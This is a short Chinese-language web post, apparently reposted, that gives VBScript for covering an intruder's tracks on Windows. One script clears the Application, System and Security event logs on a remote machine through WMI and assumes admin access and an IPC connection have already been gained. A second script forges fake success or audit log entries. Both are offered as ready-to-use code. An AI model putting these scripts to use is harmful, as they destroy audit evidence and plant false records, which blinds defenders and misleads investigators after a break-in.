| 关键词: 日志 logevent mylogs 成功 objWMIService eventcreate colLogFiles objLogfile 审计 eventtype |
1.删除日志 cleanevent.vbsstrComputer = "主机名字。。。" Set objWMIService = GetObject("winmgmts:" _& "{impersonationLevel=impersonate,(Backup)}!\\" & _strComputer & "\root\cimv2")dim mylogs(3)mylogs(1)="application"mylogs(2)="system"mylogs(3)="security"for Each logs in mylogsSet colLogFiles = objWMIService.ExecQuery _("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")For Each objLogfile in colLogFiles objLogFile.ClearEventLog() Nextnext 保存成vbs文件。使用的前提是你必须已经获取主机admin权限。并且IPC~~ 2.伪造一份日志 createlog.vbs set ws=wscript.createobject("Wscript.shell") ws.logevent 0 ,"write log success" '创建一个成功执行日志 logevent方法 logevent的用法:logevent eventtype,"description" [,remote system] eventtype 为日志类型,可以使用的如下:0 成功执行;1 执行出错;2 警告;4 信息;8 成功审计;16 故障审计 所以上面代码中,把0改为1,2,4,8,16均可,引号下的为日志描述。 PS:XP下有一个新的工具可以创建日志 eventcreate.exe 获得帮助格式 eventcreate.exe /? |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|